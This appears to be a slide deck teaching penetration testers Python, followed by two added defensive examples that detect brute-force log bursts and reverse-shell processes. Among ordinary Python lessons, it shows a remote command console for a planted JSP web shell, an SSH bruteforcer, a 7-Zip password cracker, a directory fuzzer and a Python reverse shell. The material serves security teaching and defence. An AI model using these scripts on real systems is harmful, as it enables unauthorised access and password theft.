Python for Penetration testers

Quick presentation on how a penetration tester can start using Python to automate many tasks, create new tools, etc. For my colleagues.

Published in: Technology
1 Comment
  • Thank you man, this pdf helped me to perfect my python code!

  1. Why?
     • Easy (install, learn, code)
     • Tons of libraries
     • Code is easy to understand
     • Multiplatform
     • Good for prototyping
  2. History
     • Conceived in the late 80s, first implementation in 1989
     • Created by Guido van Rossum, the Benevolent Dictator for Life
     • There are currently two branches: 2.x and 3.0
  3. Python 101
     • Interpreted language
     • Object oriented
     • Indentation is significant in Python: it is the block delimiter
     • Usual control structures (if, while, etc.)
     • Multiple levels of organization (functions, classes, modules, packages)
  4. Who is using Python?
     • Core Impact
     • ImmunityDebugger
     • Canvas
     • Peach
     • W3AF
     • Sulley
     • Sqlmap
     • Paimei
     • Impacket
     • Scapy
     • Google
     • Spike Proxy
  5. Python 101: data types
     • Strings - "Hello"
     • Numbers - 123
     • Lists - ['hello', '2', '1']
     • Tuples - ('1', '2', '3') (immutable)
     • Dictionaries - d = {'key1': 'dog', 'key2': 'cat'}
  6. Python 101: structures

        # loop over a list
        list = [1, 2, 3, 4, 5]
        for x in list:
            print x

        # conditional (x is a number, so convert it before concatenating)
        if 3 > x:
            print "3 is bigger than " + str(x)
        else:
            print "3 is smaller than " + str(x)
  7. Python 101: example
     Hello World:

        print "Hello World"

     With variables:

        msg = "Hello World"
        print msg
  8. Python 101
     • Interactive Python shell
     • The commands execute line by line as you type
     • Good for testing small pieces of code such as loops, regexes, etc.
     • Type "python" and press Enter to access the shell
  9. Python 101
     • String indexes start at 0 and can also be negative
     • msg[0] is H
     • msg[-1] is d
  10. Basic code bits

        import sys
        ofile = "names.txt"
        fil = open(ofile, 'r')    # read mode; 'w' would truncate the file
        x = fil.readlines()       # one string per line, newline included
        for y in x:
            print y
  11. Urllib2
     • Library to deal with HTTP

        import urllib2
        response = urllib2.urlopen("http://<host>/")   # URL stripped from the slide; placeholder
        html = response.read()
        print html
  12. Basic fuzzer

        import sys, urllib2
        ofile = "dirs.txt"
        fil = open(ofile, 'r')      # read mode
        dirs = fil.readlines()
        for x in dirs:
            x = x.strip()           # drop the trailing newline
            try:
                response = urllib2.urlopen("http://<host>/" + x)   # base URL stripped from the slide; placeholder
                html = response.read()
                print x, len(html)
            except urllib2.HTTPError, e:   # urlopen raises on 404 and other error codes
                print x, e.code
  13. Encoding

        import base64
        string = "TEST"
        base64.standard_b64encode(string)   # 'VEVTVA=='

        import hashlib
        m = hashlib.new('md5')
        m.update(string)
        res = m.hexdigest()
        print res                           # 033bd94b1168d7e4f0d644c3c95e35bf
  14. Generic console for web remote execution

        import httplib, urllib, sys
        host = "XXXXXXXXXX"
        while 1:
            cmd = raw_input("Exploited@" + host + "#>")
            if cmd == "exit":
                sys.exit()
            else:
                h = httplib.HTTP(host)
                cmd = urllib.quote(cmd)
                print cmd
                h.putrequest('GET', "/myconsole123/my-shell.jsp?pass=1231&cmd=" + cmd)
                h.putheader('Host', host)
                h.putheader('User-agent', 'Internet Explorer 6.0')
                h.endheaders()
                returncode, returnmsg, headers = h.getreply()
  15. 7-Zip cracker

        import os, sys, pylzma
        from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError
        pas = open('passwords.txt', 'rb')
        password = pas.readlines()
        for x in password:
            x = x.strip()               # readlines() keeps the newline
            try:
                fp = open('test.7z', 'rb')
                archive = Archive7z(fp, password=x)
                print "The password is " + x
                sys.exit()
            except Exception, e:
                fp.close()
  16. A web browser

        #!/usr/bin/env python
        import sys
        from PyQt4.QtCore import *
        from PyQt4.QtGui import *
        from PyQt4.QtWebKit import *
        app = QApplication(sys.argv)
        web = QWebView()
        web.load(QUrl(""))      # URL stripped from the slide
        web.show()              # the window is not displayed without this
        sys.exit(app.exec_())
  17. One-line web server
     • python -m SimpleHTTPServer 8080
  18. SSH bruteforcer

        import paramiko
        # hostname, username and passw come from the caller; the slide shows only one attempt
        t = paramiko.Transport(hostname)
        try:
            t.start_client()
        except Exception:
            pass
        try:
            t.auth_password(username=username, password=passw)
        except Exception:
            pass
        if t.is_authenticated():
            print "Password found " + passw
  19. Proxy Strike deflate patch
     • pd contains the POST data in the repeat function:

        import zlib
        defla = zlib.compress(pd)
  20. Reverse shell

        import socket, subprocess, os
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("", 1234))     # listener address stripped from the slide
        os.dup2(s.fileno(), 0)    # stdin, stdout and stderr now point at the socket
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p = subprocess.call(["/bin/sh", "-i"])
  21. Win32Com
     • Library that allows us to access COM objects on Win32 systems
     • We can automate Word, Excel, PowerPoint, access WMI, AD, etc.
  22. Massive printing

        from win32com import client
        import time
        word = client.Dispatch("Word.Application")
        def printPDFDocument(filename):
            word.Documents.Open(filename)
            word.ActiveDocument.PrintOut()
            time.sleep(5)           # give the print job time to spool
            word.ActiveDocument.Close()
            word.Quit()
        printPDFDocument("c:test.doc")
  23. Excel processing

        from win32com.client import Dispatch
        xlApp = Dispatch("Excel.Application")
        xlApp.Visible = 1
        xlApp.Workbooks.Open("test.xls")
        for x in range(1, 100):
            nombre = str(xlApp.ActiveSheet.Cells(x, 5))   # column E, rows 1..99
            print nombre
        xlApp.Quit()
  24. WMI

        import wmi
        c = wmi.WMI()
        for process in c.Win32_Process():
            print process.ProcessId, process.Name
  25. Interesting stuff
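Seen from the defender's side, the directory fuzzer on slide 12 and the SSH bruteforcer on slide 18 leave the same footprint: many failures from one source within a short window. This added example (Python 3, not from the deck) parses constructed Apache-style and sshd log lines and flags sources that cross a failure threshold inside a sliding window; the thresholds, addresses and log lines are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample logs: one address probes directories (404s) and guesses SSH passwords.
ACCESS_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /admin/ HTTP/1.1" 404 162
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /backup/ HTTP/1.1" 404 162
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /old/ HTTP/1.1" 404 162
198.51.100.9 - - [10/Oct/2023:13:57:01 +0000] "GET /index.html HTTP/1.1" 200 512
"""
AUTH_LOG = """\
Oct 10 13:58:01 web1 sshd[4242]: Failed password for root from 203.0.113.5 port 51234 ssh2
Oct 10 13:58:02 web1 sshd[4242]: Failed password for root from 203.0.113.5 port 51235 ssh2
Oct 10 13:58:03 web1 sshd[4242]: Failed password for root from 203.0.113.5 port 51236 ssh2
Oct 10 14:30:00 web1 sshd[4300]: Accepted publickey for alice from 198.51.100.9 port 50000 ssh2
"""

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^ \]]+)[^\]]*\] "[^"]*" (\d{3}) ')
AUTH_RE = re.compile(r'^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
                     r'Failed password for .* from (\S+) port')

def http_failures(text):
    """Yield (client, timestamp) for every 404 in Common Log Format lines."""
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m and m.group(3) == "404":
            yield m.group(1), datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S")

def ssh_failures(text, year=2023):
    """Yield (source, timestamp) for sshd 'Failed password' lines (syslog has no year)."""
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            yield m.group(2), datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")

def bursts(events, threshold=3, window=timedelta(seconds=60)):
    """Return the sources with >= threshold failures inside any `window`."""
    recent = defaultdict(deque)       # source -> timestamps still inside the window
    flagged = set()
    for src, ts in sorted(events, key=lambda e: e[1]):
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:     # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            flagged.add(src)
    return flagged
```

Both parsers feed the same detector, so `bursts(http_failures(ACCESS_LOG))` and `bursts(ssh_failures(AUTH_LOG))` each return the probing address.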
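The reverse shell on slide 20 leaves a distinctive trace on the host: after the three dup2() calls, stdin, stdout and stderr of the shell are the same socket. This added example (Python 3, Linux /proc, not from the deck) separates that pure check from the /proc reading so it can be exercised on constructed fd tables; the sample inode numbers are assumptions.

```python
import os

def stdio_on_socket(fd_targets):
    """fd_targets maps fd number -> target of the /proc/<pid>/fd/<n> symlink.
    True when fds 0, 1 and 2 all point at the same socket inode, which is
    exactly what three dup2(s.fileno(), n) calls leave behind."""
    targets = [fd_targets.get(n, "") for n in (0, 1, 2)]
    if not all(t.startswith("socket:[") for t in targets):
        return False
    return len(set(targets)) == 1

def read_fd_targets(pid):
    """Resolve the stdio symlinks of a live process; unreadable -> {}."""
    out = {}
    for n in (0, 1, 2):
        try:
            out[n] = os.readlink(f"/proc/{pid}/fd/{n}")
        except OSError:               # process gone, or not ours to inspect
            return {}
    return out

def process_name(pid):
    try:
        with open(f"/proc/{pid}/comm") as f:
            return f.read().strip()
    except OSError:
        return "?"

def scan():
    """Return [(pid, name)] for every visible process whose stdio is one socket."""
    hits = []
    try:
        entries = os.listdir("/proc")
    except OSError:                   # no procfs (non-Linux) or not readable
        return hits
    for entry in entries:
        if entry.isdigit() and stdio_on_socket(read_fd_targets(int(entry))):
            hits.append((int(entry), process_name(int(entry))))
    return hits

if __name__ == "__main__":
    for pid, name in scan():
        print(f"pid {pid} ({name}): stdin, stdout and stderr share a socket")
```

Socket-backed stdio is also normal for inetd-style services, so treat a hit as a triage lead to check against the process name and the socket's peer, not as a verdict.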